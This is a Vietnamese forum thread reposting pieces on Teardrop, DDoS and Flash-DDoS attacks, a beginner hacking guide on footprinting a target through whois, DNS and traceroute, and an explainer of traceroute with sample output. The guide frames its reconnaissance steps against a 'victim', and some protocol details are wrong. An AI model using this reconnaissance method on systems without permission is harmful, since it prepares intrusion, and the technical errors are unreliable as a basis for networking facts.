Tear Drop
Khi dữ liệu được gửi từ một hệ thống tới hệ thống khác nó được chia ra thành những mảnh nhỏ hơn và được máy đích tập hợp lại. Các gói này có một trường offset trong phần đầu của gói TCP là phần qui định phần dữ liệu nào được gửi đi. Nó kết hợp với số chuỗi, giúp cho máy đích có thể tập hợp các gói lại.
Trong phương thức tear drop các gói được chuyển đi với trường offfset chồng chéo, khiến cho máy nhận không thể ráp chúng lại và dẫn tới bị phá vỡ.
Có một kiểu tấn công mới gọi là DDOS trong đó nhiều máy tính được sử dụng để tấn công từ chối dịch vụ.
Tuy nhiên đây đều là những cách tấn công khá căn bản và các máy chủ bây giờ đều được trang bị để phòng chống mấy cái này . Cao hơn nữa là DDOS (Distributed DOS ) và DRDOS (Distributed Reflection DOS) . 2 thằng này chủ yếu tấn công qua giao thức TCP/IP cổng 80 hoặc UDP cổng 80 .Ở DDOS thì có một cái nữa là Zombie Code , nó giống như một dạng Client/Server progam . Zombie Client được cài trên một máy con tốc độ truy cập Internet lớn , còn Zombie Server sẽ chỉ ra khi nào được tấn công và tấn công cái gì . DRDOS là một phương thức cải tiến của kiểu tấn công SYN/ACK , cũng gửi hàng ngàn gói SYN tới router. Router lấy thông tin từ các gói và gửi lại gói SYN/ACK tới IP nạn nhân .Những người am hiểu và có khả năng tấn công bằng những cái này thực sự không nhiều , mà nhiều là những người sử dụng các chương trình viết sẵn để tấn công thôi.
"Quái thú DDoS" và bản ngã của con người
-------------------------------------------------------------------------------
Nguồn : Vietnamnet
Tại sao DDoS - Một hình thái tấn công từ chối dịch vụ đã được các hacker chân chính không còn thừa nhận nữa - lại đang phổ biến và trở thành thứ vũ khí nguy hiểm đến mức không thể chống đỡ? Trong nhiều nguyên nhân, có một điều đau lòng là DDoS phát sinh từ chính những tham vọng xấu khi làm chủ và điều khiển được thông tin của những cá nhân.
"Human is error"
Nhiều năm làm việc trong lĩnh vực infosec với không ít kỷ niệm vui buồn, thứ duy nhất làm tôi cảm thấy không trọn vẹn trong nghề nghiệp chính là "quái thú DDOS". Suy cho cùng tất cả mọi vấn đề phức tạp của Internet đều xuất phát từ con người. Chúng ta đã để cho bản ngã dẫn dắt, chúng ta đã tạo điều kiện và nuôi dưỡng con quái thú này."
Rồi một ngày nào đó, chính nó sẽ huỷ diệt một hệ thống giao tiếp lớn nhất và hữu ích nhất hiện tại. Câu nhận định của người xưa - "Human is error" - nghe thật xót xa nhưng cũng thật chí lý!
Một Internet đầy khiếm khuyết
Cho đến tận bây giờ Internet vẫn mang trong mình nó những khiếm khuyết từ lúc nó được xây dựng - những khiếm khuyết của quá trình thiết kế ra Internet. Một số khiếm khuyết là do giới hạn về tầm nhìn và sự chủ quan, đa số các khiếm khuyết còn lại là do con người vô tình hay cố tình tạo ra
Người Mỹ áp đặt free speak - Internet nặc danh toàn phần
Điều này có nghĩa là bản chất thiết kế của Internet không hề đòi hỏi người dùng phải xác thực khi sử dụng. Muốn dùng internet? Bạn chỉ cần ngồi vào bất cứ máy tính nào có kết nối và sử dụng nó. Internet không quan tâm danh tính, dấu vân tay ... , hay bất cứ thứ gì khác ở bạn!
Rất ít người dám chạy ra đường và ... cướp giật một thứ gì đó của người khác. Nhưng ở trên Internet, họ sẽ rất tự tin khi thực hiện một hành vi xấu, bởi vì họ biết Internet che chở cho họ!
Theo tôi nghĩ, nếu muốn người Mỹ đã có thể tạo ra một Internet an toàn hơn bằng cách "ép buộc" mọi người dùng xác thực danh tính trước khi sử dụng. Về kỹ thuật điều này có thể hiện thực rất đơn giản, bạn có thể hình dung trước khi có thể sử dụng internet bạn phải cung cấp dấu vân tay để kích hoạt network interface!
Người Mỹ không quan tâm đến vấn đề này, vì họ thích free speak và "áp đặt" đặc tính free speak cho toàn Internet. Loài người sử dụng Internet-nặc danh, họ sẽ rất tự tin để free speak. Tuy nhiên, khi nặc danh loài người lại trở nên rất hoang dã và thể hiện rõ nét đặc tính "con" của mình. Họ tấn công lẫn nhau, đánh cướp, v..v.
Về kỹ thuật, giao tiếp trên Internet là trực tiếp thuần tuý. A giao tiếp với B sẽ không cần phải xin phép C, bản chất thiết kế của Internet hỗ trợ điều này và mọi nỗ lực kiểm soát thông tin của C sẽ dễ dàng bị vô hiệu hoá. Bạn có thể nhìn thấy điều này với các website bị firewall bởi ISP sẽ dễ dàng bị vô hiệu bằng vô số proxy trên Internet hoặc các kỹ thuật tunneling. Internet là do người Mỹ thiết kế, quản lý, kiểm soát, khai thác và họ có khả năng áp đặt !!!
Loài người hành xử cục bộ - Internet thiếu khả năng phối hợp
Có rất nhiều vấn đề của Internet về phương diện kỹ thuật rất dễ giải quyết, nhưng do chúng ta hành xử cục bộ nên đã không giải quyết được.
Điển hình là vấn đề giả mạo địa chỉ IP. Nếu triệt tiêu được khả năng giả mạo địa chỉ IP thì gần như giải được 80% bài toán nặc danh và cả những bài toán khác của Internet.
Yêu cầu kỹ thuật để loại trừ vấn đề giả mạo địa chỉ IP là mỗi network owner phải thực hiện lọc (filter) kiểm soát các packet đi ra khỏi hệ thống của mạng mình và loại trừ các packet có địa chỉ nguồn không thích hợp. Làm việc này mất năm phút, đơn giản là thêm vào vài dòng trong access list của border router. Hơn hai mươi năm qua, vấn đề giả mạo địa chỉ vẫn không giải quyết được! Đơn giản chỉ vì việc giả mạo địa chỉ IP không ảnh hưởng trực tiếp đến network owner - chủ nghĩa "mặc kệ nó" điển hình.
Điều gì sẽ xảy ra nếu các quốc gia không phối hợp với nhau để giải quyết các vấn nạn của Internet. Một số hệ thống của nước X bị hacker nước Z sử dụng để tấn công mạng của nước Y, các quốc gia này sẽ phối hợp với nhau như thế nào? Làm sao để trừng phạt hành vi của hacker nếu không có thoả thuận về luật ??! Hiện tại hầu như chưa có bước tiến nào của các quốc gia trong việc chuẩn bị cho các khả năng này!
Bản chất của "quái thú" DDOS
Tấn công DDOS không có gì phức tạp về phương diện kỹ thuật. Định nghĩa đơn thuần của tấn công DDOS : "Là một kiểu tấn công đưa một hệ thống cung cấp dịch vụ đến mức hoạt động tới hạn về tài nguyên, hay gây nhầm lẫn logic dẫn đến hệ thống ngừng hoạt động".
Tôi không giải thích nhiều bản chất của DDOS, nhưng chỉ muốn so sánh hai dạng thức cổ điển và hình thái mới của DDOS là Flash-DDOS
Hình thái DDOS cổ điển
--------------------------------------------------------------------------------
Nguồn được trích từ Vietnamnet
Vấn đề then chốt của hacker tấn công bằng hình thái cổ điển là nắm quyền điều khiển càng nhiều máy tính càng tốt, sau đó anh ta sẽ trực tiếp phát động tấn công hàng loạt từ xa thông qua một kênh điều khiển. Với quy mô mạng lưới tấn công bao gồm vài trăm nghìn máy, hình thái này có thể đánh gục ngay lập tức bất cứ hệ thống nào. Phối hợp với khả năng giả mạo địa chỉ IP, kiểu tấn công này sẽ rất khó lần theo dầu vết
Mô hình Hình thái DDOS cổ điển
Mô hình này có một số nhược điểm:
- Mạng lưới tấn công là cố định và tấn công xảy ra đồng loạt nên rất dễ điều tra ngược tìm manh mối.
- Software cài lên các Infected Agent là giống nhau và có thể dùng làm bằng chứng kết tội hacker.
- Phía nạn nhân có thể điều chỉnh hệ thống phòng vệ để ngăn chặn vì mạng lưới tấn công là "khả kiến".
- Hacker buộc phải trực tiếp kết nối đến mạng lưới các máy tấn công tại thời điểm tấn công để điều khiển nên rất dễ lần ra thủ phạm.
Flash-DDOS
Lợi dụng tính phổ biến và khả năng có thể thực hiện vai trò của web client của Flash player (hầu như có trong mọi trình duyệt trên Internet hiện tại) hacker tiến hành "cải tiến" mô hình DDOS cổ điển.
Hacker treo một file flash trên một website trung gian có nhiều người truy xuất, người dùng truy xuất website này file flash sẽ được tải về máy và được chương trình Flash thực thi. Từ đây vô số các yêu cầu truy xuất sẽ gởi đến website mục tiêu.
Không thể chặn Flash DDoS !
Flash DDOS có một số đặc tính khiến cho việc ngăn chặn và phát hiện gần như là không thể:
- Mạng lưới tấn công phức tạp và tự hình thành:
+ Không cần thiết phải nắm quyền điều khiển và cài DDOS software vào các infected agent. Thay vào đó mọi user với một trình duyệt có hỗ trợ nội dung Flash (có Flash player) sẽ trở thành công cụ tấn công.
+ Số lượng attack agent tùy thuộc vào số lượng user truy xuất các 3rd party website đã bị hacker "nhúng" nội dung flash, số lượng này thay đổi theo thời gian và hoàn toàn không thể nhận biết địa chỉ IP nguồn, vì đây là các user thông thường.
+ Không hề có quá trình gởi lệnh và nhận báo cáo giữa hacker và mạng lưới tấn công, toàn bộ lệnh tấn công được "nhúng" trong nội dung flash và hacker không cần nhận báo cáo do đây là mô hình tấn công bất đồng bộ.
+ Tấn công bất đồng bộ: việc tấn công diễn ra không cần có mệnh lệnh. User truy xuất 3rd party website, load nội dung flash về trình duyệt và Flash player thực thi nội dung flash thì ngay lập tức máy của họ trở thành một attack agent-liên tục gởi hàng trăm request đến webserver nạn nhân.
+ Quy mô tấn công phụ thuộc vào số lượng 3rd party website bị lợi dụng và số lượng user thường xuyên truy xuất các website này. Chỉ tính trung bình hacker lợi dung được 10 3rd party website và mỗi website này có số lượng truy xuất khoảng 100 user tại một thời điểm thì tổng số request mà server nạn nhân phải hứng chịu tại một thời điểm lên đến con số vài chục ngàn!!! Đây là một số liệu kinh hoàng với bất kỳ ai làm quản tri hệ thống của bất cứ website nào và kết quả thường là hệ thống tê liệt ngay lập tức!
killerGM
#8 20-03-2007, 13:14
killerGM
Guest Bài gởi: n/a
Phòng chống Flash-DDOS là cực kỳ khó khăn, Vì sao vậy?
--------------------------------------------------------------------------------
Nguồn được trích :Vietnamnet
+ Không thể phân biệt giữa request tấn công và request thông thường vào hệ thống. Khi số lượng request đến hệ thống rất lớn thì người quản trị sẽ cần "gạt bỏ" bớt các request tấn công, tuy nhiên anh ta sẽ gặp khó khăn trong việc "tìm và diệt" request tấn công.
+ Tấn công đến từ mọi phía: có mạng lưới tấn công linh hoạt nên hầu như không thể nhận diện request tấn công từ địa chỉ IP nguồn
+ Tất cả biện pháp kỹ thuật an toàn thông tin đều gặp phải một giới hạn thực tế-đó là tài nguyên của mọi hệ thống đều là hữu hạn. Khi xử lý các request thì các biện pháp này sẽ sử dụng tài nguyên của hệ thống, khi số lượng request là rất lớn thì chính việc xử lý "tìm và diệt" sẽ ngốn hết tài nguyên của hệ thống (CPU, RAM, ...)
Truy lùng thủ phạm tấn công Flash-DDOS gặp nhiều khó khăn: hacker chỉ tiếp xúc các 3rd party website 1 lần duy nhất để upload flash và anh ta có quyền chọn lựa! Quá trình tấn công là tự xảy ra và bất đồng bộ, nên anh ta chỉ cần upload và sau đó mọi việc tự diễn ra. Hệ thống nạn nhân hầu như không thể biết các 3rd party website đang "treo" flash tử thần (trừ khi hacker không đủ trình độ và để lộ referer trong các flash request-trường hợp này ngày càng ít). Chỉ có chính user đang bị lợi dụng tấn công hoặc các ISP mới tiếp xúc trực tiếp các 3rd party website đang "treo" flash tử thần, user thì không thể biết và không cần biết, ISP thì có thể biết và không có trách nhiệm phải làm! Nạn nhân bị thiệt hại nhiều nhất và cảm thấy cô độc nhất - đặc biệt nếu họ là các doanh nghiệp có hoạt động diễn ra trên mạng - doanh nghiệp thương mại điện tử
Quái thú và bản ngã của "netizen"
Các kiếm khuyết của Internet sẽ càng làm các bản ngã của con người bộc lộ rõ nét. Flash-DDOS là vô cùng nguy hiểm, dễ thực hiện, hầu như không thể chống đỡ hay truy lùng thủ phạm!
Bản ngã thứ nhất - muốn có quyền lực
Nắm quyền điều khiển hệ thống thông tin của người khác là một quyền lực! Để có quyền lực này, giới hacker chính quy sẽ phải nghiên cứu và làm việc thật nghiêm túc trong một thời gian rất dài (5-10 năm). Đối với họ, mục tiêu sau cùng của quá trình hacking là nắm quyền điều khiển toàn bộ hệ thống - có thể coi đó là một thú vui, họ không phá hoại hay tước đoạt công sức của người khác. Đó là một trò chơi trí tuệ và mang lại sự phát triển cho các hệ thống thông tin.
Nhiều người muốn có quyền lực này, nhưng họ lại không muốn làm việc và không muốn chờ đợi lâu! Họ sử dụng "quái thú DDOS", họ muốn có một quyền lực đơn giản là làm cho một hệ thống bị ngưng hoạt động và từ đó họ cho rằng mình đã đạt đến quyền lực tối thượng - quyền sinh sát!
Thật ra, họ đã đặt dấu chấm hết cho con đường trở thành một hacker chính quy và bước vào bóng tối với những kiến thức và mục tiếu hết sức nông cạn. Điểm thú vị của trò chơi là ở quá trình chơi, kết quả thì có gì là quan trọng?
Sao lại chơi một trò chơi mà bạn có quá nhiều lợi thế, buộc người khác phải tham gia và luôn gây thiệt hại nặng nề cho xã hội?
Bản ngã thứ hai - tham lam và bất tài
Gần đây có rất nhiều vụ DDOS vì các nguyên nhân kinh tế, các doanh nghiệp TMĐT vừa chớm hình thành trong quá trình cạnh tranh đã "huy động" DDOS như một phương cách cạnh tranh và đoạt tiên cơ trên thị trường hết sức nóng bỏng này!
Một đồng xu bạn bỏ ra để thuê DDOS chính là một nhát cuốc đào mồ chôn TMĐT của Việt Nam - trong đó có bạn. Hãy suy nghĩ và hành động thật chín chắn! Hãy tạo ra các sản phẩm tốt, giá rẻ, dịch vụ chu đáo, thị trường sẽ có chọn lựa của nó.
Bản ngã thứ ba - ích kỷ cục bộ và dối trá
Để giải quyết bài toán DDOS rất cần sự phối hợp của nhiều đối tượng: người dùng cuối, ISP, các nhà làm luật, các chuyên gia, ...
Nhận thấy nguy cơ từ DDOS, chúng ta vẫn còn chậm chân trong việc đưa những cánh tay ra cùng nhau giải quyết vấn nạn này. Chúng ta đang cố thủ trong cái vỏ ốc cá nhân và chờ đợi một phép màu xảy ra để DDOS không còn tồn tại. Điều này là không thể, ít nhất là trong 05 năm tới, đã đến lúc phải hành động!
Là những chuyên gia, chúng ta phải trung thực và thật sự có những nhận định đúng đắn về thảm hoạ này. Dối trá vì bất cứ lý do gì đều là không thể chấp nhận được. Chúng ta không thể có bất kỳ dấu vết hay thông tin gì từ log trên các hệ thống, hãy nói sự thật về khả năng điều tra DDOS cho cộng đồng biết và cùng nhau nhìn nhận bản chất của vấn đề, từ đó đề ra các biện pháp phối hợp giải quyết! Không che dấu thông tin về một "nạn dịch" - điều mà mọi bác sĩ đều biết!
Kết luận
DDOS và các hình thái tấn công khác trên Internet là có thể khắc phục với sự quyết tâm cao và sự mạnh mẽ gạt bỏ các bản ngã của chúng ta, với sự cộng tác nhiệt tình và có trách nhiệm của các ISP.Trung tâm VNCERT ra đời là một sự đáp ứng cho các kỳ vọng lớn lao của cộng đồng TMĐT Việt Nam. Tôi vẫn có niềm tin lớn vào sự ổn định của Internet Việt Nam trong thời gian sắp đến.
killerGM
#9 20-03-2007, 13:41
killerGM
Guest Bài gởi: n/a
Kỹ thuật Hack cơ bản
--------------------------------------------------------------------------------
Thân chào tất cả các bạn , nhằm đáp ứng nhu cầu học hỏi trong hacking và security, fantomas311 đã biên soạn một bộ bài viết "Basic hacking" và các bài viết liên quan đến hacking hệ thống để giới thiệu đến các bạn . Xin khuyến cáo với những ai muốn học hack một cách fast food là các bạn không nên đọc bài viết này ! Vì tôi không post những bài dạy hack cho các bạn , mà tôi chỉ post bài theo phương châm "hack như thế nào" . Hãy đọc , suy nghĩ và làm bằng đôi tay và khối óc của mình !!
Trước khi các hacker thực sự bắt tay vào việc, họ phải tiến hành 3 bước cơ bản là in dấu ấn (foot printing) , Quét (scanning) và điểm danh(enumeration). Bài viết này đề cập đến kỹ thuật in dấu ấn và những vấn đề liên quan.
**In dấu ấn là gì ??**
In dấu ấn là việc dùng các công cụ và kỹ thuật để lấy thông tin cơ bản đầu tiên về một tổ chức hoặc một chuyên khu web muốn tấn công ( trong bài viết này tạm gọi là victim). Việc in dấu ấn có hệ thống một tổ chức sẽ cho phép hacker thấy rõ tình hình an ninh ( độ bảo mật) của tổ chức đó.
**Tại sao cần in dấu ấn ??**
Foot Printing giúp có thể định danh tất cả các mẩu tin và nắm những thông tin cơ bản (đôi khi khá quan trọng) về victim
** Kỹ thuật in dấu ấn **
Có rất nhiều kỹ thuật in dấu ấn khác nhau, bài viết này sẽ mô tả các bước giúp bạn hoàn thành một đợt phân tích dấu ấn kỹ lưỡng.
*Bước 1:
định phạm vi hoạt động: Bước này nói cho đơn giản là bạn phải xác định rõ cái mà bạn muốn hack là gì ( một công ty , một server hay chỉ là một web cá nhân ... )
- Đối với người mới bắt đầu, bạn nên đọc kỹ và ghi lại những thông tin mà trang web cung cấp cho bạn ( những thông tin về nó , như số ĐT , mail của webmaster , địa chỉ ....). Có nhiều khi những thông tin này lại là "chiếc chìa khoá vàng" cho bạn Những mục đáng quan tâm bao gồm :
+ Các vị trí
+ Các công ty hoặc thực thể liên quan
+ Các kết nối hoặc tin tức có được
+ Các ngôn ngữ bảo mật nêu rõ các cơ chế bảo mật đã thiết đặt ( cấu hình fire wall chẳng hạn )
+ Các số điện thoại , tên liên lạc và Email .....
Ngoài ra, bạn cũng có thể xem lại mã nguồn HTML để tìm những sơ hở trong lập trình , bên cạnh đó , những chú thích nằm trong các thẻ HTML như < ! và ~ cũng là một " tài nguyên" đáng khai thác !! ( thí dụ như )
Sau khi nghiên cứu trang web , bạn tìm thêm những thông tin cung cấp các manh mối bổ sung về tình trạng của tổ chức và tình hình an ninh của nó ( trên báo chí , các bản tin trên NET chẳng hạn) . Những động cơ tìm kiếm là chìa khoá cho bạn . Sau đây là một vài động cơ tìm kiếm :
http://google.com http://sec.gov
http://cyberarmy.com Http://deja.com
http://networksolution.com http://dogpile.com
http://astalavista.com http://ipswich.com
http://arin.net/whois/ http://ferretsoft.com
Okie, hãy tiến hành bước đấu tiên trong kỹ thuật Hack !! B)
*Bước 2 : điểm danh mạng
Trong bước này , việc đầu tiên là định danh các domain và mạng có liên quan đến victim . Muốn làm điều này , hãy truy xuất dữ liệu của network solution ( www.networksolution.com ) và American Registry for Internet Number ( www.arin.net )
Một số kiểu truy vấn :
+Organizational : Tất cả các thông tin có liên quan đến một tổ chức cụ thể
+Domain:---------------------------------- domain -------
+Network:-----------------------------------mạng hoặc IP
+Point of contact:-------------------------1 cá nhân cụ thể ( admin )
*Bước 3 : Truy vấn DNS
Sau khi định danh các domain của tổ chức đích (victim), bạn có thể bắt đầu truy vấn DNS . Nếu DNS được cấu hình bấp bênh, ta có thể moi được thông tin tiết lộ về tổ chức . Một trong những cách cấu hình sai nghiêm trọng nhất mà một điều hành viên có thể mắc phải là cho phép người dùng internet không tin cậy thực hiện chuyển giao miền DNS ( zone transfer). Sự cố này có thể cho thấy tên hệ chủ, các IP ẩn .... nói chung là các thông tin muốn che dấu ! Việc cung cấp địa chỉ IP bên trong cho 1 người dùng không tin cậy trên internet cũng giống như cung cấp bản đồ ngôi nhà mình cho kẻ trộm vậy !!
Đến đây, có lẽ bạn có một câu hỏi " Zone transfer - how ??" . Xin thưa là đây là một vấn đề khác, có lẽ tôi sẽ đề cập trong một bài viết khác của mình để tránh loãng bài viết . Kết thúc bước 3 tại đây !
*Bước 4: trinh sát mạng
Sau khi đã có bản đồ trong tay, thì đây là giai đoạn "xâm nhập thực tế" để xác định lộ trình truy cập tiềm năng mạng ( tạm hiểu như là việc do thám để xác định các con đường trước khi tiến hành đánh cướp á mà ! )
Để thực hiện công việc này , xin giới hiệu các bạn chương trình trace route ( ftp://ftp.ec.lbl/traceroute.tar.z ) có trong hầu hết phiên bản của Unix & WinNT . Trong WinNT , nó có tên là tracert.
Trace route là một công cụ chẩn đoán do Van Jacobson viết để cho phép xem tuyến đường mà một gói tin IP sẽ theo từ server này sang server khác
Nếu bạn không rành các lệnh trong Unix , có thể dùng VIsual Route ( http://www.visualroute.com ) để thực hiện tiến trình trinh sát(tracerouting) này . Giao diện của visual route trông rất bắt mắt & dễ sử dụng. Nhưng không có tác dụng tốt với các mạng có quy mô lớn .
Ngoài ra , bạn còn có thể thực hiện một kỹ thuật phức tạp hơn gọi là "tiến trình quét giao thức firewall" (sẽ đề cập ở Basic hacking II - Scanning của fantomas311 )
Vậy là công đoạn đầu tiên của việc hack vào một hệ thống đã xong . Bây giờ, sau khi đã thực hiện hoàn tất các bước trên, bạn ( tôi chỉ nói những người đã làm đúng các bước trên) có thể tự hỏi : "vậy có tác dụng gì ??" Làm gì tiếp theo??" "những thông tin thu được có tác dụng gì?" " Có nhất thiết phải thực hiện bước này không ?? "
Nhiều câu hỏi quá ! Nhưng xin để các bạn tự trả lời vậy ! Tôi chỉ trả lời 1 câu thôi ! Bước tiếp theo của quá trình hack - theo lý thuyết - là Scanning . Quá trình Scanning sẽ được đề cập trong bài viết tiếp theo của fantomas311 : " Basic Hacking part II - Scanning"
Hy vọng bài viết này làm bạn hài lòng
Sơ Lược Trace Route
Trong bài viết trên tôi đã đề cập đến traceroute. Vậy Traceroute là gì ?? Mời các bạn xem bài viết sau:
Traceroute là gì?
Traceroute là một chương trình cho phép bạn xác định được đường đi của các gói packets từ máy bạn đến hệ thống đích trên mạng Internet.
Một ví dụ về Traceroute!
Traceroute có thể làm được gì? Bạn hãy xem ví dụ sau sẽ rõ!
C:\windows>tracert 203.94.12.54
Tracing route to 203.94.12.54 over a maximum of 30 hops
1 abc.netzero.com (232.61.41.251) 2 ms 1 ms 1 ms
2 xyz.Netzero.com (232.61.41.0) 5 ms 5 ms 5 ms
3 232.61.41.10 (232.61.41.251) 9 ms 11 ms 13 ms
4 we21.spectranet.com (196.01.83.12) 535 ms 549 ms 513 ms
5 isp.net.ny (196.23.0.0) 562 ms 596 ms 600 ms
6 196.23.0.25 (196.23.0.25) 1195 ms1204 ms
7 backbone.isp.ny (198.87.12.11) 1208 ms1216 ms1233 ms
8 asianet.com (202.12.32.10) 1210 ms1239 ms1211 ms
9 south.asinet.com (202.10.10.10) 1069 ms1087 ms1122 ms
10 backbone.vsnl.net.in (203.98.46.01) 1064 ms1109 ms1061 ms
11 newdelhi-01.backbone.vsnl.net.in (203.102.46.01) 1185 ms1146 ms1203 ms
12 newdelhi-00.backbone.vsnl.net.in (203.102.46.02) ms1159 ms1073 ms
13 mtnl.net.in (203.194.56.00) 1052 ms 642 ms 658 ms
Tôi cần biết đường đi từ máy tôi đến một host trên mạng Internet có địa chỉ ip là 203.94.12.54. Tôi cần phải tracert đến nó! Như bạn thấy ở trên, các gói packets từ máy tôi muốn đến được 203.94.12.54 phải đi qua 13 hops(mắt xích) trên mạng. Đây là đưòng đi của các gói packets:
Netzero(ISP đã gởi dữ liệu đi) -> Spectranet (một nhà công cấp mạng xương sống - Backbone Provider) -> New York ISP -> New York Backbone -> Asia -> South Asia -> India Backbone -> New Delhi Backbone -> một router khác trong New Delhi Backbone -> New Delhi ISP
Như vậy, host có địa chỉ ip 203.94.12.54 nằm ở New Delhi, India, South Asia! Bạn cũng có thể telnet đến 203.94.12.54 trên cổng 13(datetime) để xác định giờ GMT qua đó bạn có thể biết được vị trí của host này(yêu cầu là host 203.94.12.54 phải chạy daemon datetime và được định cấu hình đúng về thời gian)!
Traceroute hoạt động như thế nào?
Trước hết, bạn cần biết về ICMP, TTL và cách làm việc của các routers(bộ định tuyến)!
Những kiến thức cơ bản
ICMP - Internet Control Message Protocol. ICMP được dùng để thông báo các lỗi xảy ra trong quá trình truyền đi của các gói dữ liệu trên mạng. ICMP thuộc tầng vận huyển - Transpoort Layer! Tầng ứng dụng HTTP FTP Telnet Finger SSH DNS
POP3/IMAP SMTP Gopher BGP
Time/NTP Whois TACACS+ SSL DNS SNMP RIP
RADIUS Archie
Traceroute tftp Ping
Tầng vận chuyển
TCP
UDP
ICMP
OSPF
Tầng Internet
IP
ARP
Tầng vật lí Ethernet/802.3 Token Ring (802.5) SNAP/802.2 X.25 FDDI ISDN
Frame Relay SMDS ATM Wireless (WAP, CDPD, 802.11)
Fibre Channel DDS/DS0/T-carrier/E-carrier SONET/SDH DWDM
PPP HDLC SLIP/CSLIP xDSL Cable Modem (DOCSIS)
Tất cả các ICMP messages đều được chuyển đi cùng với các IP datagrams. Mỗi ICMP message được gói trong IP datagram sẽ có dạng như sau:
+---------------------+-------------------------+
| IP Header(20 bytes) | ICMP message (32 bytes) |
+---------------------+-------------------------+
Sau đây là cấu trúc của một IMCP message: (tham khảo RFC792 để biết thêm!)
0 7 8 15 16 31
+-----------------+-----------------+-----------------+
| Type (0 or 8) | Code (0) | 16-bit Checksum |
+-----------------+-----------------+-----------------+
| Indentifier | sequence number |
+-----------------+-----------------+-----------------+
| |
| Optional Data (nội dung tùy thuộc vào Type và Code) |
| |
+-----------------------------------------------------+
trường type có 15 giá trị khác nhau, tùy thuộc vào từng loại ICMP error message cụ thể. Ví dụ type=3 để chỉ định cho thông báo lỗi "Không đến được đích" - "Destination unreachable" error message!
trường code = sub-error dùng để xác định chính xác lỗi đã xảy ra. Ví dụ, type=3 và code=0 nghĩa là "Network Unreachable"(không đến được mạng); nếu type=3, code=1 nghĩa là "Host Unreachable"(không đến được host)...
TTL - Time to Live. TTL là một trường 8 bit trong IP header(bạn hãy xem lại cấu trúc của IP header!). TTL là thời gian gói dữ liệu tồn tại trên mạng trước khi nó bị bỏ qua. Người gởi dữ liệu đi sẽ xác định một giá trị TTL trước, thường là từ 32 -> 64. Giá trị này sẽ được giảm đi một khi một khi được chuyển qua một bộ định tuyến trên mạng. Khi giá trị này bằng 0, datagram này sẽ bị bỏ qua và giao thức ICMP sẽ báo lỗi về cho người gởi. Điều này sẽ tránh cho datagram này đi vào một vòng lặp vô tận qua các bộ định tuyến.
Mỗi bộ định tuyến khi nhận được IP datagram sẽ giảm giá trị TTL của datagram này đi một. Hầu hết các bộ định tuyến đều không giữ lại datagram này trong thời gian quá 1 giây trước khi chuyển datagram này đi. Nên giá trị TTL có thể coi bằng hop(counter) = số bộ định tuyến mà datagram này vừa vượt qua.
Khi bộ định tuyến nhận được một datagram có trường TTL bằng 0 hoặc 1, nó sẽ không chuyển datagram này đi tiếp. Thay vào đó, nó sẽ bỏ qua datagram này và gởi một ICMP message "Time Exceeded"(quá thời gian) trở lại cho người đã gởi datagram này! Vì ICMP message mà bộ định tuyến gởi trở lại cho người gởi có địa chỉ nguồn - source address là địa chỉ ip của bộ định tuyến này nên người gởi có thể biết được địa chỉ ip của router này!
Cách làm việc của traceroute!
Traceroute gởi một IP datagram có TTL=1 đến hệ thống đích. Router đầu tiên nhận được datagram này sẽ giảm giá trị TTL đi một -> TTL=0 và router này sẽ bỏ qua datagram này(không gởi nó đi tiếp!) và gởi một ICMP error message với địa chỉ ip nguồn là địa chỉ của nó đến máy bạn. Như vậy router có thể xác định địa chỉ ip của router thứ nhất! Sau đó, traceroute sẽ gởi một datagram mới đi với giá trị TTL=2(1+1=2) đến hệ thống đích. Router đầu tiên sẽ giảm giá trị của TTL đi một -> TTL=1(2-1=1) và chuyển datagram này sang router thứ 2. Router thứ 2 nhận được datagram có TTL=1 sẽ giảm TTL=0. Rounter 2 nhận thấy TTL=0 nên nó sẽ không chuyển datagram này đi tiếp. Router 2 sẽ gởi trở lại máy bạn một ICMP error message với địa chỉ ip nguồn là địa chỉ ip của nó(router 2). Như vậy trình traceroute trên máy bạn sẽ biết được router thứ 2 mà datagram đã đi qua. Traceroute sẽ tiếp tục gởi một datagram khác có TTL=3(2+1=3) đi và lặp lại quá trình trên cho đến khi datagram đến được hệ thống đích!
Nếu bây giờ IP datagram đã đến được đích, TTL=1. Host đích sẽ bỏ qua datagram này và nó cũng sẽ không gởi "Time Exceeded" ICMP error message. Như vậy thì bạn sẽ không thể nào biết được là mình đã đến đích chưa?! Traceroute dùng một cơ chế khác như sau:
Traceroute gởi UDP datagrams đến host đích trên các cổng UDP có số hiệu lớn(>30000). Sở dĩ nó chọn các cổng có giá trị lớn vì thường không có ứng dụng nào đang lắng nghe ở các cổng này. Khi host đích nhận được UDP datagram này, nó sẽ gởi trả lại một ICMP error message "Port Unreachable"(không đến được cổng) cho traceroute. Bây giờ thì traceroute có thể phân biệt được sự khác nhau giữa ICMP error message "Time Exceeded" với "Port Unreachable" để biết được đã đến được đích hay chưa?!
Ghi chú: ICMP error message "Time Exceeded" có type=1 và code=0; ICMP eror message "Port Unreachable" có type=3 và code=3
Tổng kết: traceroute gởi UDP datagrams đến host đích với giá trị TTL=1 và được tăng sau mỗi lần để xác định các routers mà datagrams đã đi qua. Mỗi router sẽ gởi trở về một ICMP message "Time Exceeded". Riêng hệ thống đích sẽ gởi trở lại cho traceroute một ICMP message "Port Unreachable". Traceroute dựa vào sự khác biệt này để xác định xem đã đến được đích chưa?!
Ví dụ cuối cùng!
host2 # traceroute xyz.com
traceroute to xyz.com (202.xx.12.34), 30 hops max, 40 byte packets
1 isp.net (202.xy.34.12) 20ms 10ms 10ms
2 xyz.com (202.xx.12.34) 130ms 130ms 130ms
Dòng đầu tiên cho biết hostname và địa chỉ IP của hệ thống đích. Dòng này còn cho chúng ta biết thêm giá trị TTL<=30 và kích thước của datagram là 40 bytes(20-bytes IP Header + 8-bytes UDP Header + 12-bytes user data).
Dòng thứ 2 cho biết router đầu tiên nhận được datagram là 202.xy.34.12, giá trị của TTL khi gởi đến router này là 1. Router này sẽ gởi trở lại cho chương trình traceroute một ICMP message error "Time Exceeded". Traceroute sẽ gởi tiếp một datagram đến hệ thống đích.
Dòng thứ 3, xyz.com(202.xx.12.34) nhận được datagram có TTL=1(router thứ nhất đã giảm một trước đó - TTL=2-1=1). Tuy nhiên, xyz.com không phải là một router, nó sẽ gởi trở lại cho traceroute một ICMP error message "Port Unreachable". Khi nhận được ICMP message này, traceroute sẽ biết được đã đến được hệ thống đích xyz.com và kết thúc nhiệm vụ tại đây.
Trong trường hợp router không trả lời sau 5 giây, traceroute sẽ in ra một dấu sao "*"(không biết) và tiếp tục gởi datagram khác đến host đích!
Tác giả : Fantomas311 - Vietnam Security
killerGM
#10 20-03-2007, 13:45
killerGM
Guest Bài gởi: n/a
